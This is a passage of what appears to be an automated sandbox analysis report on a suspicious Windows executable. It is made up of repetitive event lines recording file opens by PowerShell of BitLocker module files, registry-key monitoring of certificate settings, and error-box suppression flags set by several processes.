Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\UBONg7lmVR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
